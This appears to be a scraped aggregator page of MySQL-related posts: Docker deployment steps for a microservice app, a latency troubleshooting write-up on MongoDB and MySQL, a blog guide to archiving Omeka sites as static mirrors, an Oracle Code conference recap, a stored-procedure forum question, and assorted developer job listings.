Step 4/6 : ADD /poplardir/poplar-user-service-2.0.0.jar /poplardir/
 ---> 254f7eca9e94
Step 5/6 : ENTRYPOINT java -jar poplar-user-service-2.0.0.jar
 ---> Running in f933f1f8f3b6
 ---> ce512833c792
Removing intermediate container f933f1f8f3b6
Step 6/6 : CMD java -version
 ---> Running in 31f52e7e31dd
 ---> f6587d37eb4d
Removing intermediate container 31f52e7e31dd
ProgressMessage{id=null, status=null, stream=null, error=null, progress=null, progressDetail=null}
Successfully built f6587d37eb4d
Successfully tagged lvwangbeta/poplar-user-service:latest
[INFO] Built lvwangbeta/poplar-user-service
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------

5.2 Starting the containers

Since poplar involves quite a few containers, first create a custom network, poplar-network, for them:

docker network create --subnet=172.18.0.0/16 poplar-network
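
To double-check the network and the subnet that was just created, docker network inspect can be used:

docker network inspect poplar-network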

Run containers from the images built above and give each one an IP in the same subnet.

Start the Zookeeper registry:

docker run --name poplar-zookeeper --restart always -d  --net poplar-network --ip 172.18.0.6  zookeeper 

Start MySQL:

docker run --net poplar-network --ip 172.18.0.8  --name poplar-mysql -p 3307:3306 -e MYSQL_ROOT_PASSWORD=123456 -d  lvwangbeta/poplar-mysql

Start Redis:

docker run --net poplar-network --ip 172.18.0.9 --name poplar-redis -p 6380:6379 -d redis

Start the business services:

docker run --net poplar-network --ip 172.18.0.2 --name=poplar-user-service -p 8082:8082 -t lvwangbeta/poplar-user-service

docker run --net poplar-network --ip 172.18.0.3 --name=poplar-feed-service -p 8083:8083 -t lvwangbeta/poplar-feed-service

docker run --net poplar-network --ip 172.18.0.4 --name=poplar-action-service -p 8084:8084 -t lvwangbeta/poplar-action-service

docker run --net poplar-network --ip 172.18.0.10 --name=poplar-api -p 8080:8080 -t lvwangbeta/poplar-api

Running docker ps should now show all of the containers above up and running.

At this point the poplar back end is fully built and running and serving requests; clients (whether Web or App) see only a single unified API.


          Server-Side Performance Optimization: Two Troubleshooting Cases      Cache   Translate Page   Web Page Cache   

This article describes two cases of troubleshooting high cross-IDC latency from two years ago. After careful analysis and localization they were eventually resolved, with a very positive effect on the online business. I'm sharing them here so we can learn from each other.

Recently, while reviewing the performance of the service interfaces in a project, I ran into two problems. Below is the approach I used to locate and solve them.

The service previously had no detailed performance logging; performance testing had only been done in the telecom datacenter (T datacenter), where every interface met expectations, so the service went live.

To analyze interface performance further, we added logging to the critical path of each business interface, aggregated the latency figures from the logs, and fed them into Grafana. Observing the data revealed two kinds of problems:

  1. For services that connect to MongoDB, latency in the netcom datacenter (C datacenter) is higher than in the telecom datacenter (T datacenter).

  2. For services that connect to MySQL, latency in the C datacenter is higher than in the T datacenter.

    NOTE: These service interfaces are read-only; there are no write operations.

    We investigated the two problems separately.

MongoDB

A quick check showed that the MongoDB instance had been migrated at some point, and after the migration only the instance in the T datacenter was kept; the C datacenter had no secondary, which is why C-datacenter latency was higher. After deploying a secondary in the C datacenter, we were surprised to find that T-datacenter latency became higher than C's. Further investigation showed that the read preference configured in the code was secondary (prefer secondaries), so once the C datacenter had a secondary, the T datacenter also went to the C datacenter for reads, which raised T-datacenter latency. Changing the read preference to nearest helped, but not as much as expected. A careful look at the official documentation

The driver reads from a random member of the set that has a ping time that is less than 15ms slower than the member with the lowest ping time. Reads in the MongoClient::RP_NEAREST mode do not consider the member’s type and may read from both primaries and secondaries.

shows that with nearest the client maintains the set of members whose ping time is within 15 ms of the closest member. Our T and C datacenters are connected by direct fiber with about 12 ms of latency, so on any given request the client might read from the T datacenter or from the C datacenter.

This is worth keeping in mind in future applications.
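
For illustration, here is a minimal sketch of setting the read preference (and the 15 ms "nearest" window) explicitly with the MongoDB Java driver; the class names follow the 3.x driver and the host names are placeholders:

import com.mongodb.MongoClient;
import com.mongodb.MongoClientOptions;
import com.mongodb.MongoClientURI;
import com.mongodb.ReadPreference;

public class ReadPreferenceDemo {
    public static void main(String[] args) {
        MongoClientOptions.Builder opts = MongoClientOptions.builder()
                .readPreference(ReadPreference.nearest())  // the code originally used secondary-style reads
                .localThreshold(15);                       // "within 15 ms of the closest member" window
        // t-mongo and c-mongo are placeholder hosts for the two datacenters
        MongoClient client = new MongoClient(
                new MongoClientURI("mongodb://t-mongo:27017,c-mongo:27017/?replicaSet=rs0", opts));
        System.out.println(client.getReadPreference());
        client.close();
    }
}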

Mysql

Among all the services, only one interface reads from MySQL, and its behavior was even stranger: latency in the C datacenter was more than 100 ms higher than in the T datacenter.


At first we guessed that the business logic might be writing to the primary somewhere, for example writing to MySQL or Redis, and that cross-datacenter writes were causing the high latency.

Actual analysis showed there were no writes in the business logic; the extra time was all spent reading MySQL.

MySQL does have a replica in the C datacenter, so why is reading from the replica still so slow? Pinging the C-datacenter MySQL IP from our server showed normal latency, only a fraction of a millisecond, so it was not a network problem.

The next step was to capture packets and analyze exactly what interactions happen between our server and MySQL, and which step was slow.


The capture showed that ordinary SELECT queries got responses quickly, but when our server sent a "DESCRIBE tableName" request to the MySQL server, the server waited quite a long time (30 ms+) before returning a result. A single API request issued several DESCRIBE requests, which is why the overall C-datacenter latency ended up so high.

With the problem located, we set out to fix it.

Before solving it, two questions had to be sorted out:

  1. What is the DESCRIBE tableName command for? The business code never calls it explicitly. Can the request be removed?

  2. If it cannot be removed, why is its latency so high, and can it be optimized?

The first question is straightforward. Issuing DESCRIBE is common practice in today's ORMs: it fetches the table structure from the database in order to build the model dynamically. It is possible to avoid DESCRIBE, but then every model would have to be declared by hand in the application, which greatly increases development cost, so that approach was ruled out. The DESCRIBE command had to stay.

The second question: why is the latency so high? DESCRIBE is a very simple command with no complex work behind it, and the primary did not show the problem at all. Knowing that the DBAs run the Atlas middleware in front of MySQL, a bold guess was that the middleware was the culprit: it routes SELECT requests to the replicas but sends DESCRIBE to the primary, possibly because Atlas only recognizes certain read-only SQL and routes that to the replicas, while every other kind of request is considered too complex to classify and goes to the primary by default. Of course this was only a guess; I have not read the Atlas source code, so I could not jump to conclusions.

With these clues in hand we checked with the DBAs and confirmed that Atlas does send the DESCRIBE command to the primary; the reason is to avoid returning a wrong table structure from a replica when primary and replica are temporarily inconsistent. Given that, it is hard to say whether the middleware's behavior is reasonable or not, so we had to think about what could be optimized on our side. If we want to avoid executing DESCRIBE on every request, then besides declaring the models by hand as mentioned above, the other option is a cache: table structures change so rarely that we can safely cache them for a long time and avoid these frequent requests. The business uses the Phalcon framework, which already provides such a metadata cache; Yii has a similar feature, schemaCaching.

Once this cache is enabled, the effect is obvious:


C-datacenter latency dropped from 120 ms to 7 ms, and T-datacenter latency dropped from 10 ms to 5 ms.

What still needs to be considered is how to refresh the cache when the table structure does change, without affecting the business. There are several ways to implement this; I'll leave that as an exercise for the reader.

Summary

The approach to solving these problems is to follow the principle of minimization: make bold guesses about the likely causes, verify them quickly, progressively narrow the scope until the problem is reduced to a minimal reproducible case, and then dig into the specific cause. All of this has to be backed by data: if day-to-day development produces rich enough log data, problems can be located quickly, or even caught before they happen.

One last plug: guess what I drew?

[image]


          codeigniter bid table design      Cache   Translate Page   Web Page Cache   
codeigniter bid table design Help me to change the design of the bid page. Thanks. (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Software Developer - SkipTheDishes - Saskatoon, SK      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:46 GMT - View all Saskatoon, SK jobs
          Senior Cloud engineer      Cache   Translate Page   Web Page Cache   
Senior Cloud engineer - Other

Senior Cloud engineer

Task/Responsibilities

As part of our modernization strategy, you will take an active participation in the design of two new applications eventually deployed into the Microsoft Azure cloud; a reference data management system and a digitization platform primarily used for document data extraction and access through APIs. As such, you will be a key actor in charge of designing and integrating those applications with the current on premise IT landscape. Your assignments will include:
Designing and documenting the cloud architecture, ensuring non-functional requirements and alignment with IT security guidelines
Developing and executing practical use cases to validate the proposed design and technology, eg high availability, performance, crash recovery
Defining and documenting new standards relevant to the development and deployment of cloud applications
Assessing and optimizing the cost of using Microsoft Azure
Upskilling of the teams involved in the design, development, provisioning and operation of cloud applications
Qualifications/required skills - Master's Degree (or equivalent) in a computer-based discipline
Good communication skills with the ability to justify and challenge architecture decisions
Hands-on experience in architecting Microsoft Azure native applications
Hands-on experience in Microsoft Azure infrastructure services (IaaS). Concrete experience in migrating on premise applications to Microsoft Azure is an asset
Experience with Serverless, Microservices and REST architecture styles
Experience in application security design, incl. identity and access management together with encryption and key management
Experience in regulatory requirements and concerns is an asset, eg risk assessment, exit strategy, data protection
Practical experience in the following technology:
o Linux OS, preferably RedHat Linux
o Java/J2EE, preferably RedHat EAP. Knowledge in Go, Spring Boot, Angular and/or React is an asset
o Messaging Middleware, preferably RedHat A-MQ
o RDBMS, preferably Oracle and MySQL
o Identity Management, preferably OpenAM
o Jenkins, Docker and Ansible
o Version Control System, preferably Git
o Repository manager, preferably Artifactory
o Apache Maven or Apache Ant
- Proficiency in written and spoken English; French and German language skills is an asset

    Company: SKILLFINDER INTERNATIONAL
    Job type: Other

          Ed Summers: Omeka Staticify (👜🕸)      Cache   Translate Page   Web Page Cache   

If you have some old Omeka sites that are still valuable resources, but are no longer being actively maintained, you might want to consider converting them to a static site along with the PHP code and database. This means that the site can stay online in much the form that it’s in now, at the same URLs, and you still have the code and database to bring it back if you want to. From a maintenance perspective this is a big win since you no longer have the problem of keeping the PHP, Omeka and MySQL code up to date and backed up. The big trade off is that the site becomes truly static. Making any changes across the static assets would be quite tedious. So only consider this if you really anticipate that the project is no longer being actively curated.

I have done this a few times with many Wordpress sites, but Omeka is a little bit different in a few ways so I thought it was worth a quick blog post to jot down some steps.

Disable Search

This is kind of important for usability. Since there will no longer be any server side PHP code and database for it to query, there’s unfortunately no way to have a search form on your Omeka site. This may be a deal break for you, depending on how you are using the search. The good news however is that people can still find your site via Google, DuckDuckGo, or some other search engine.

To disable search take a look in your Omeka theme, often in common/header.php, and simply comment out the code that generates the search form.

It might be nice to be able to generate a static Lunr.js index for your database and drop it into your Omeka site before creating the static version. This is an approach that the minimal computing project Wax has taken, and it should work well for average size collections. Or perhaps you could configure a Google Custom Search Engine, and similarly drop that into your Omeka before conversion. But it may be easiest to simply accept that some functionality will be lost as part of the archiving process.

Localize External Resources

It's fairly common to use JavaScript and CSS files from various CDNs. To find them, view the source of one of your Omeka pages and scan for http to review the types of JavaScript and CSS files that might be needed for the pages to work properly. If you find any, try downloading them into your theme and then updating your theme to reference them there.

Use Slash URLs

This one is kind of esoteric, but could be important. Most Omeka installs don’t use trailing slashes on URLs, for example:

https://archive.blackgothamarchive.org/items
https://archive.blackgothamarchive.org/items/show/121

The problem with this is that when you use a tool like wget to mirror a website it will download those pages using a .html extension:

archive.blackgothamarchive.org/items/show/121.html
archive.blackgothamarchive.org/items.html

This works just fine when you mount it on the web, but if anyone has linked to https://archive.blackgothamarchive.org/items/show/121 they will get a 404 Not Found.

One way around this is to convert your application URLs to end in a slash prior to creating your mirror. You can do this by modifying the url function which can be found in libraries/globals.php or in application/helpers/Url.php in older versions of Omeka. This issue ticket has some more details.

Then your URLs will look like this:

https://archive.blackgothamarchive.org/items/
https://archive.blackgothamarchive.org/items/show/121/

and will be saved by wget as:

archive.blackgothamarchive.org/items/index.html
archive.blackgothamarchive.org/items/show/121/index.html

Then when someone comes asking for an old link like:

https://archive.blackgothamarchive.org/items/show/121

Apache will happily redirect them to:

https://archive.blackgothamarchive.org/items/show/121/

and serve up the index.html that’s there. Whew. Yeah, all that for a for a forward slash. But if links are important to you it might be worth the code spelunking to get it working.

Do the Crawl

I’ve used wget for this in the past. It’s a venerable tool, that has been battle hardened over the years. It won’t execute JavaScript in your pages, but most Omeka applications don’t rely too heavily on that – it could be a problem if you use this approach to archive other types of sites.

The one problem with wget is it has many, many options, many of which interact in weird ways. Here’s an example wget command I use:

wget \
  --output-file $log \
  --warc-file $name \
  --mirror \
  --page-requisites \
  --html-extension \
  --convert-links \
  --wait 1 \
  --execute robots=off \
  --no-parent $url 2>/dev/null

This is painful so I've developed a little helper utility I call bagweb so I don't need to remember the options and what they do every time I want to mirror a website. The --warc-file option will also create a WARC file as it goes if you tell it to, which can be useful, as we'll see in a second. You run bagweb giving it a URL and a name to use for a new directory that will contain a BagIt package:

% bagweb https://archive.blackgothamarchive.org bga

This will run for a while writing a log to bga.log. Once it’s done you’ll see a directory structure like this:

% tree bga
bga
├── bag-info.txt
├── bagit.txt
├── data
│   ├── bga.warc.gz
│   └── archive.blackgothamarchive.org.tar.gz
├── manifest-md5.txt
└── tagmanifest-md5.txt

You can zip up that directory or copy it to an archive. But before we do that let’s test them.

Test!

You can unpack your mirrored website and make sure it works properly by using Docker to easily start up an Apache instance:

tar xvfz bga/data/archive.blackgothamarchive.org.tar.gz
cd archive.blackgothamarchive.org
docker run -v `pwd`:/usr/local/apache2/htdocs -p 8080:80 httpd

And then turn off your Internet connection (wi-fi, ethernet, whatevs) and visit this URL in your browser:

http://localhost:8080/

You should see your Omeka site! For extra points you can download Webrecorder Player and open the generated WARC file and interact with it that way.

Install

Now that you have your static version of the website you need to move it up to your production web server. That should be as simple as copying the tarball up to a <DocumentRoot> configuration.

You may also want to create a tarball of the Omeka server side code and a MySQL dump of the Omeka database to save in your bag. It’s probably worth noting some details about external dependencies in the bag-info.txt such as the version of Apache, PHP, MySQL and the operating system type/version for anyone courageous enough to try to get the code running again in the future.

So, hardly a walk in the park. But if the Omeka environment is at risk for whatever reason this is a pretty satisfying process that ensures that the data is preserved, and still available on the web for people to use.


          Frontend Developer - Mayfair - Evolution Recruitment Solutions - Mayfair, SK      Cache   Translate Page   Web Page Cache   
PHP, MySQL, any backend frameworks. Exposure to design tools (Photoshop, XD and other Adobe products). Frontend Developer - Mayfair - £40-£55k DOE....
From Evolution Recruitment Solutions - Thu, 17 May 2018 21:11:30 GMT - View all Mayfair, SK jobs
          Analyst programmer web - Maisons Laprise - Montmagny, QC      Cache   Translate Page   Web Page Cache   
SQL, PHP, MySQL, Drupal CMS, jQuery, Linux server configuration, mobile development (Android, iOS), experience in website development...
From Maisons Laprise - Fri, 06 Apr 2018 09:23:46 GMT - View all Montmagny, QC jobs
          Programmeur - Maisons Laprise - Montmagny, QC      Cache   Translate Page   Web Page Cache   
SQL, PHP, MySQL, Drupal CMS, jQuery, Linux server configuration, mobile development (Android, iOS), experience in website development...
From Maisons Laprise - Thu, 05 Apr 2018 07:36:23 GMT - View all Montmagny, QC jobs
          Software Development Manager      Cache   Translate Page   Web Page Cache   
e-Merge IT Recruitment - Johannesburg, Gauteng - to work within a forward thinking, innovative and fast growing environment. If you are a Software Development Manager with skills in PHP, MySQL...
          Comment on Order By with Group By in MySQL by Avinash      Cache   Translate Page   Web Page Cache   
Can you show what you have tried?
          Comment on Order By with Group By in MySQL by Z Thakker      Cache   Translate Page   Web Page Cache   
Well that's not worked for me
          Comment on Loops in MySQL Stored Procedure by Zsolt Perkó      Cache   Translate Page   Web Page Cache   
In the WHILE section, this sentence "This is reverse of the WHILE loop", I think, correctly is "This is reverse of the REPEAT loop". By the way, this is good and compact description.
          DrupalCI: Environments: MySQL 5.7 environment      Cache   Translate Page   Web Page Cache   

Problem/Motivation

Needed for test coverage for #2616488: [meta] MySQL 5.7 / MariaDb 10.1.* support.

Proposed resolution

Remaining tasks

User interface changes

API changes

Data model changes


          Connect To Mysql Database Use Select Insert      Cache   Translate Page   Web Page Cache   
connect to mysql database use select insert
          Fix Joomla website (offline)      Cache   Translate Page   Web Page Cache   
Our Joomla website has been disabled and needs fixing. Here is a message from our web host explaining the issue: Looking at the server logs, I see that your website was disabled because the contact form on it was being exploited to send spam... (Budget: $30 - $250 USD, Jobs: CSS, HTML, Joomla, MySQL, PHP)
          Add Payment Method To Website      Cache   Translate Page   Web Page Cache   
Looking for Experienced Front End Developer with at least 3-6 months experience on Web Development & Adding PayPal Payment Method Gateway to Website. For additional details contact in PM. Thank You (Budget: $10 - $30 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          Introduction to database joins with mariadb and mysql join examples      Cache   Translate Page   Web Page Cache   

LinuxConfig: In this tutorial we will see the different type of joins available when using MySQL or MariaDB.


          Need Laravel developer with HTML/CSS experience to implement features for existing site      Cache   Translate Page   Web Page Cache   
We are seeking a Web Application Developer that will help develop and test new features for our existing web based application (Laravel 5.5). This is an on-going project (3-6 months, maybe more) implementing... (Budget: $750 - $1500 USD, Jobs: HTML, Laravel, MySQL, PHP, Website Design)
          Build an Android Image Dealing APP      Cache   Translate Page   Web Page Cache   
1This is an image Android APP(React/MySQL) 2 User Management: Signup/Login/Forget Password(support FB/INS/Mobile/Email account login) 3 Image: upload/show/catalog(by Type)/mosaic(not difficult just put... (Budget: $250 - $750 NZD, Jobs: Android, Mobile App Development, MySQL, Software Architecture)
          delta web      Cache   Translate Page   Web Page Cache   
I need my website re-configured.I need you to design and build my personal website. (Budget: $30 - $250 USD, Jobs: MySQL, PHP, Shopify, System Admin, WordPress)
          Freelance analyst / programmer      Cache   Translate Page   Web Page Cache   
Development and consulting for programs and/or systems. Visual .NET, C++, Java, PHP. SQL Server, MySQL. Advanced programming in Excel and Access.
          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Cryptocurrency Exchange, Blockchain developer - Upwork      Cache   Translate Page   Web Page Cache   
We are looking for an experience developers to develop cryptocurrency exchange and platform.

The developer will have previous experience creating wallets for bitcoin and altcoins.

Our platform is expected to operate as p2p an p2c

Just have in mind creating a binance with more flexible features and functions.


Posted On: July 11, 2018 04:12 UTC
Category: Web, Mobile & Software Dev > Web Development
Skills: AngularJS, CSS, CSS3, HTML, HTML5, JavaScript, jQuery, MySQL Administration, PHP, Web Design, Website Development
Country: Nigeria
click to apply
          mysql error in query in sp      Cache   Translate Page   Web Page Cache   

Hi All

I am using a stored procedure in MySQL; below is my SP.

////////// below is my code

CREATE DEFINER=`root`@`localhost` PROCEDURE `sp_newemp21`

(
    in empid int,
    in empname varchar(500),
    in empaddress varchar(500),
    in emplocation varchar(500)
)
BEGIN

    if (empid is null)
    then
        INSERT INTO newemp21(empname, empaddress, emplocation)
        VALUES(empname, empaddress, emplocation);
    else
        update newemp21 set empname=empname, empaddress=empaddress, emplocation=emplocation where empid=empid;
    END IF;

End

CREATE TABLE `newemp21` (
`empid` int(11) NOT NULL AUTO_INCREMENT,
`empname` varchar(500) DEFAULT NULL,
`empaddress` varchar(500) DEFAULT NULL,
`emplocation` varchar(500) DEFAULT NULL,
PRIMARY KEY (`empid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;


          Software Developer - SkipTheDishes - Winnipeg, MB      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:49 GMT - View all Winnipeg, MB jobs
          Java JEE Developer      Cache   Translate Page   Web Page Cache   
VA-Reston, Java Developer Reston, VA MUST: Experienced Mid level Java Developer 5 years of experience in software/web services design or related area Knowledge of Java, Java services and frameworks such as Spring, JSP (Java Server Pages), and JSF (Java Server Faces) Should have knowledge of Web Services; SOAP, XML, J2EE (Java Enterprise Edition) Some knowledge of MySQL and Linux and knowledge of web language
          Freelance Web Programming Instructor, FLASHCOM INDONESIA, Surabaya      Cache   Translate Page   Web Page Cache   

Job description: Teach according to students' needs with a flexible schedule. Responsibilities: teach according to students' needs with a flexible schedule. Experience requirement: at least 1 year of experience. Skills: proficient with software and hardware. Qualifications: 1. Male & female 2. Min. 23 years old 3. Proficient in PHP programming, HTML, and MySQL 4. Domiciled […]

For more information about the Freelance Web Programming Instructor position at FLASHCOM INDONESIA, Surabaya, see www.loker.id


          (USA-OK-Oklahoma City) Full Stack Application Developer      Cache   Translate Page   Web Page Cache   
          (USA-WA-SEATTLE) Lead Software Engineer      Cache   Translate Page   Web Page Cache   
Headquartered in Seattle, Washington, Wireless Advocates is a leading provider of wireless products and services both online and in over 600 retail locations nationwide. Together with the top wireless carriers (Verizon, T-Mobile, AT&T, Sprint) and OEM's (Apple, Samsung, LG, Motorola), our knowledgeable teams of on-site wireless professionals deliver high-value products and services - helping consumers connect and communicate every day. Car Toys is the parent company of Wireless Advocates and the largest independent multi-channel specialty car audio and mobile electronics retailer in the United States. We offer a broad selection of the best car audio, mobile entertainment, navigation/road safety, and security systems from the top manufacturers and also offer an array of auto salon services. Our consultative process ensures you're getting what you need, and our certified installers and superior installation standards ensure your products will be installed flawlessly. Mission and Scope The Lead Software Engineer is a seasoned software engineer with leadership skills and extensive knowledge and experience in designing and building complex, highly scalable and dependable application systems. The candidate will interact closely with project management, business analysts, test engineers and other software engineers to shape, identify, prioritize, and realize project requirements in the delivery of business solutions. Successful candidates will have a comprehensive knowledge of web front-end and back-end development tools, technologies, practices, and standards; proven ability to integrate large scale systems or third party products; and a track record of delivering high-quality, web-based business solutions in a timely and effective manner. + Guide, mentor and lead a team of software engineers + Customize, integrate, and support vendor-supplied software to support business users + Work in DevOps agile teams primarily in .NET and Azure technology environment + Follow established coding standards and other group procedures, both individually and at a team level. Must ensure proper code reviews are held for the project and that development processes and tool utilization are followed. + Contribute to the engineering team’s culture of high code quality. Accountable for the quality of code that is delivered to QA and production; must ensure that appropriate code reviews and unit testing are adequately performed. + Ensure that continuous integration is performed on the application source code and constantly seeks to enhance the continuous integration methods of the development team to ensure extremely high quality of code. + Work closely with project management and requirements analysts to thoroughly understand the system requirements and ensure they are properly implemented. Also must seek ways to meet the underlying business requirements with low-cost, yet highly re-usable patterns and actively escalate requirements that may cause unnecessary risk or cost. + Ensure that application code adheres to enterprise and industry standards and best practices, including performance and security standards. + Work with offshore developers to implement new features + Other duties as assigned. + 8+ years of developing applications and customer-facing, ecommerce websites. 
+ Working knowledge of the following technologies: C#.Net, SQL/Server, HTML, CSS, JavaScript, JQuery, XSLT, PHP, PowerShell, SQL queries + Experience in implementing and supporting vendor-supplied software packages + Experienced in handling managed services engagements + Experienced in gathering and analyzing user requirements + Experienced in modern UI design + Skilled and experienced in leading technical teams + Ability to understand and discuss business issues as well as technical issues + Strong written and verbal English communication skills + Self-motivated, persistent, results-oriented, enthusiastic, flexible + Ability to work with minimal supervision, independently or as a member of a team + Confidence in situations with high ambiguity and uncertainty + Have a willingness to learn + Expert-level Object Oriented knowledge, with demonstrated complex implementations a must, e.g., custom API's, optimization techniques, and design patterns. + Must have practical experience developing and public cloud concepts and protocols, in particular Azure + Experience with DevOps tools and automation + Experience working in an iterative(agile/scrum) development environment + Experience in documenting design and architecture artifacts and presenting artifacts for architectural review Pluses: + Working knowledge of the following technologies: SSIS, VB.Net, MySQL, WordPress + Experience in customizing MS Dynamics AX applications using C++ + Experience in configuring, customizing, and integrating Magento and Monsoon ecommerce platforms + Test-driven development and continuous integration experience is preferred Car Toys, Inc. / Wireless Advocates supports and encourages a diverse workplace. Any offer of employment is contingent upon an employment background check. We’ve Got You Covered At Car Toys / Wireless Advocates, LLC., our people are our greatest asset. We are dedicated to providing our employees the tools to succeed in their career, as well as to maintain a healthy work-life balance. We offer the following benefits: Medical, Dental, and Vision Healthcare Coverage 401(k) with company match Company Paid Commuter Program Paid Vacation, Sick, PTO and Holidays Requisition ID: 2018-13508 External Company URL: www.wirelessadvocates.com Street: Fairview Ave N, Suite 900 Post End Date: 8/27/2018
          EXPERIENCED AND MATURE PHP DEVELOPER NEEDED URGENTLY      Cache   Translate Page   Web Page Cache   
PLEASE READ PROPERLY. DON'T ASK STUPID QUESTIONS. READ THIS AND THEN BID! We have an open source CRM done in codeignitor PHP FRAMEWORK and it needs to be customised: The customisations needed (READ CAREFULLY): - Complete change of branding and colors... (Budget: $10 - $30 AUD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Fix my open SSL, with team viewer...(BIN Folder) its not appearing in cmd screen      Cache   Translate Page   Web Page Cache   
I need to make sure my OPEN SSL, works fine, in order to create some certificate, and keys... I installed on my computer, but its not working, some error mistakes appear on screen need to fix it..., i change value parameters, something its missing.... (Budget: $10 - $30 USD, Jobs: Linux, MySQL, PHP, Software Architecture, Web Security)
          Medical Diagnosis system using AI in Android application      Cache   Translate Page   Web Page Cache   
Implementation In our application, our major logic deals with the usage of AI in Android Application for smartphone. Whenever user opens app, user will first enter user details: 1) For First time user Registration form opens and required results stored in database... (Budget: $30 - $250 USD, Jobs: Android, Artificial Intelligence, Java, Mobile App Development, MySQL)
          Sr. Lead Linux Engineer - TekPartners, A P2P Company - Milwaukee, WI      Cache   Translate Page   Web Page Cache   
Oracle RAC Clusters. Setting up new Red Hat Linux bare-metal and virtual machines. Working understanding of Databases of Oracle, Progress, MySQL, PostgreSQL or...
From TekPartners - Wed, 27 Jun 2018 02:06:02 GMT - View all Milwaukee, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page   Web Page Cache   
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sat, 30 Jun 2018 02:19:22 GMT - View all Bellevue, WA jobs
          SR. Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page   Web Page Cache   
Presentation, Application, Business, and Data layers). 4+ years of database development experience with technologies like MS SQL, MySQL, or Oracle 4+ years of...
From Microsoft - Tue, 20 Mar 2018 17:02:08 GMT - View all Bellevue, WA jobs
          Software Engineer - Cloud - JP Morgan Chase - Seattle, WA      Cache   Translate Page   Web Page Cache   
Design and implement automated deployment strategies that scale with the business. Knowledge in relational and NoSQL databases like MySQL, SQLServer, Oracle and...
From JPMorgan Chase - Wed, 20 Jun 2018 10:43:27 GMT - View all Seattle, WA jobs
          Oracle Code: recap, continued      Cache   Translate Page   Web Page Cache   

The Oracle Code day on July 3rd was an opportunity to see Oracle's software and platforms in action, along with the latest features and trends. Among the interesting sessions was MySQL Document Store. MySQL handles document-oriented storage with a touch of RDBMS, NoSQL and JSON documents. A JSON document is an object with a data structure; the structure is implicit in the document. It is compact and standardized, and the format is supported natively in MySQL (via ECMA-404). Many functions are attached to it: searches, aggregations, and the ability to run queries. MySQL 8 also adds a few functions on the JSON side.

The Document Store part is a significant element of the database. It is schemaless, it has a flexible data structure and, of course, it is JSON ready. The CRUD principle applies to it: create, read, update and delete. Like other databases, MySQL wants to reconcile the SQL and NoSQL worlds. To do so, the Document Store side offers several components for developers: the MySQL X Plugin, the X Protocol, InnoDB cluster, new APIs, a MySQL shell and connectors. In short, MySQL supports a hybrid relational and NoSQL model with different engines and storage models.

As you know, Oracle has its own public cloud offering: Oracle Cloud. One of the sessions showed how to use Terraform, and therefore infrastructure as code, in this context and with the DevOps idea (it had to fit in somewhere :-)). Terraform is an infrastructure-as-code tool with open source and enterprise versions. The session walked through installing the tool on Oracle Cloud Infrastructure and then creating infrastructure code. The session replays are worth watching.

Another session that caught our interest: the path to pair programming in Che with Atom Teletype. The speaker recalled some fundamentals about Eclipse Che: it is a version of the IDE with a web interface and workspaces in containers, which can themselves run a language server such as Eclipse JDT. The tool supports LSP, the Language Server Protocol also found in Visual Studio. Collaborative code editing was the central part of the session.

The idea is to edit projects and code Google Docs style: getting developers to collaborate for code mentoring, code reviews or shared editing. Atom Teletype is an extension to the Atom editor for pair programming and live concurrent editing. Several libraries are available: teletype-client, teletype-server and teletype-crdt, with a communication layer based on CRDT (conflict-free replicated data type) and WebRTC. Typically, with Teletype, there is a host portal and a number of guests; it takes care of sharing the programming session and shares the host portal's files. If you don't know it, take a look.

Java was a central theme of the day. Among the sessions was "the JVM memory toolbox". Ah, the famous memory management; whole books could be written about it. There are mechanisms to measure performance and to size memory. For example, you can enable the garbage collector logs. How many Java developers think of that? On JRE 8 you can use the Parallel GC. jVisualVM is another tool to visualize JVM memory. You can also look at GCViewer and at the logs (think about the logs, I may have said that already). To avoid an out of memory error (everyone's favorite), increase the heap size and restart the JVM from time to time (yes, really, to purge it and put it back in shape). In any case, a session we recommend!
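
For reference, a minimal way to turn those GC logs on from the command line (JDK 8 flag names; JDK 9+ replaces them with -Xlog:gc*), with app.jar as a placeholder:

java -XX:+PrintGCDetails -XX:+PrintGCDateStamps -Xloggc:gc.log -jar app.jar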

Let's finish with the session: accelerated Oracle JET - Visual JavaScript / HTML5 Cloud Development. Web development is a bit of a mess... a jungle: Backbone, jQuery, Meteor, Angular, React, etc. Oracle JET is an enterprise-oriented open source toolkit to help you develop with JS, HTML5 and REST. It supports many open source libraries such as Knockout.js, jQuery, Hammer and RequireJS, and Oracle has added its own libraries: UI components, templates, internationalization, responsive design, etc. The tool can therefore be used to develop mobile applications. The basic idea is to offer visual development: a low-code approach, using the most recent technologies, with a focus on business applications. Of course, you can manipulate the code directly, add whatever logic you want, and extend the platform (via UI components or JS libraries).

Check out all the Oracle Code sessions: https://developer.oracle.com/code/paris-june-2018

François Tonic


          Need a full stack Developer for a full time job      Cache   Translate Page   Web Page Cache   
I will be reading all the bids for the next 2 days, even if you are the last bid so be comfortable in bidding. Looking to hire a full time developer who has hands on experience with: PHP MySQL (Codeigniter,... (Budget: $250 - $750 USD, Jobs: MySQL, PHP, Software Development, Web Development, Website Design)
          Project of Datatables      Cache   Translate Page   Web Page Cache   
An ongoing project needs developers with experiences of Datatables. 5-8 working hours per day is expected. If you or your team also has experience on the theme of Metronic, it might assist. Please provide... (Budget: $8 - $15 CAD, Jobs: Bootstrap, jQuery / Prototype, MySQL, PHP)
